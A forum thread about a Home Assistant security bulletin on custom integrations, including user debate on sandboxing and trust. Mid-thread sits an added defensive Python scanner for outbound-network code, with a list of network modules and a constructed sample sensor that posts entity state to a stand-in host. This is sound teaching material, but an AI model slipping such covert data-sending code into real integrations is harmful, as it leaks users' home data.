Security Bulletin

It’s open source. Anyone can check.

2 Likes

Every open source software reaches its peak and security suddenly becomes a big issue. Lock down here and there, and in the end remove support for 3rd party addons. Really hope HA does not go in this direction.

3 Likes

I hope they find a way to somehow sandbox custom components.

1 Like

Why would you trust that when they specifically say to use them at your own risk? There’s a big clue there. You either go down the Apple model and sandbox/lockdown everything (which is fine if you’re taking a nice percentage of everyone else’s work) or you leave it open and flexible which as a consequence means they don’t need to vet every line of code in every custom component. There has to be a compromise. If you want the highest possible security then choose a platform which isn’t open source and doesn’t allow custom code to run. Even then nothing is guaranteed.

3 Likes

Get some perspective. How many malicious custom integrations from members of this community have there been?

4 Likes

After updating from 2021.1.1 to 2021.1.2, my Supervisor -> System tab displays 2020.12.7 as the currently installed and latest version.


However my system health points to 2021.1.2

System Health

version: 2021.1.2
installation_type: Home Assistant OS
dev: false
hassio: true
docker: true
virtualenv: false
python_version: 3.8.7
os_name: Linux
os_version: 5.4.79-v8
arch: aarch64
timezone: Europe/Paris

Anyone else having the same issue?

That’s the Supervisor version vs the Core version.

2 Likes

You should add the usual “We are still analyzing the extent of the situation and will be providing additional details very soon.”, otherwise it seems that there will be no more info. The blog post seems very “done” at the moment.

2 Likes

Yes and as soon as the current beta for supervisor is pushed to stable, that page will also show the core version and that will be the end of the current confusion.

I guess the risk is only real for those who exposed their HA in a DMZ and/or via a Nabu Casa subscription.
I don’t see how it can have a serious impact with personal and local use of HA (even with a VPN); the Wifi network would have to be broken first.

1 Like

The threat is on the inside: what if the custom integration is sending out information?

1 Like

Based on what? What if an integration is sending information to an external source?

Thanks for your quick work on addressing this.

1 Like

My mistake, I thought it was a newly discovered security leak from outside, because that risk always exists with non-official sources.
So to make it more clear, does that announcement mean that it is now recognized that some specific custom integrations are malicious, leaking out personal data?

No.

1 Like

Happy that most of my setup is locally controlled Z-Wave, Zigbee and Tasmota devices. The only credentials I could leak are a couple free API keys…

Surprised to see comments here and on Reddit thread that think a VPN would somehow protect them from an already installed component being able to transmit data out of the system :worried:

2 Likes
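The point made above, that a VPN or firewall on the inbound side does nothing once a component is already running inside the Home Assistant process, can be made concrete. The following is an added example, not code from Home Assistant or from anyone in this thread: a small static audit that walks a custom_components tree and lists which Python files import outbound-network libraries and which URLs they embed. The module list, the directory layout and the sample component (including its hostname) are assumptions constructed for the example.

```python
"""Added example (not Home Assistant code): static audit of a
custom_components tree for outbound-network primitives.

A custom integration runs with the full privileges of the Home
Assistant process, so nothing on the inbound path (VPN, NAT, firewall)
stops it from phoning home. This scan does not prove a component is
clean, but it shows where to look before trusting one.
"""
import ast
import pathlib
import re
import tempfile

# Modules that let Python open an outbound connection.
# Assumption: illustrative list, not exhaustive.
NETWORK_MODULES = {
    "socket", "requests", "aiohttp", "httpx", "urllib", "http",
    "smtplib", "ftplib",
}
URL_RE = re.compile(r"https?://[^\s\"']+")


def scan_file(path: pathlib.Path) -> dict:
    """Return network imports and URL string literals found in one file."""
    tree = ast.parse(path.read_text(encoding="utf-8"), filename=str(path))
    imports, urls = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in NETWORK_MODULES:
                    imports.add(root)
        elif isinstance(node, ast.ImportFrom) and node.module:
            root = node.module.split(".")[0]
            if root in NETWORK_MODULES:
                imports.add(root)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            urls.update(URL_RE.findall(node.value))
    return {"file": path.name, "imports": sorted(imports), "urls": sorted(urls)}


def scan_integration(root: pathlib.Path) -> list:
    """Scan every .py file under root; return only files with findings."""
    results = []
    for py in sorted(root.rglob("*.py")):
        found = scan_file(py)
        if found["imports"] or found["urls"]:
            results.append(found)
    return results


# Constructed sample: a fake integration whose sensor.py quietly posts
# entity state to an external host. Domain and hostname are made up.
SAMPLE_INIT = "DOMAIN = 'example_local'\n"
SAMPLE_SENSOR = '''
import requests
from homeassistant.helpers.entity import Entity  # parsed only, never run

COLLECTOR = "https://collector.example.invalid/ingest"

class ExampleSensor(Entity):
    def update(self):
        requests.post(COLLECTOR, json={"state": self.state})
'''


def demo() -> list:
    """Write the sample tree into a temp dir, scan it and return findings."""
    with tempfile.TemporaryDirectory() as tmp:
        comp = pathlib.Path(tmp) / "custom_components" / "example_local"
        comp.mkdir(parents=True)
        (comp / "__init__.py").write_text(SAMPLE_INIT, encoding="utf-8")
        (comp / "sensor.py").write_text(SAMPLE_SENSOR, encoding="utf-8")
        return scan_integration(comp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a real installation by calling scan_integration on the config directory's custom_components folder instead of demo(). Note that a URL assembled at runtime, or a request made through a library not in NETWORK_MODULES, will not show up; egress logging on the network side is the complementary check.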

It would be nice if we could read some more specific information, at least which custom integrations are affected. I use a number of custom integrations, installed via HACS, and some of them I depend on frequently so before I install the update I need to know if they are affected so I can decide myself if I will take the risk.

Thanks in advance,
Rien

2 Likes

There’s no way that the HA team would be able to test every single custom component available via HACS and report whether there’s any problem with them after an update. So I would not wait for them to give you such a report.
That’s why they are custom and they are used at your own risk.
If a custom component isn’t doing anything suspicious or questionable, it should not be a problem.

The HA team may, in the near future, give answers to why this update was made and whether any specific custom components were found to be exploiting this; however, I would not hold my breath for them to evaluate thousands of components that are not a part of core. If you want a guarantee that nothing will be affected, use only components included in core.

5 Likes

Unfortunately the lack of very basic technical knowledge no longer surprises me, but it is incredibly worrying.

7 Likes

Agreed,

Maybe it’s an idea that all users who experience issues with their custom integrations after installing the update mention it in this or a separate thread.

1 Like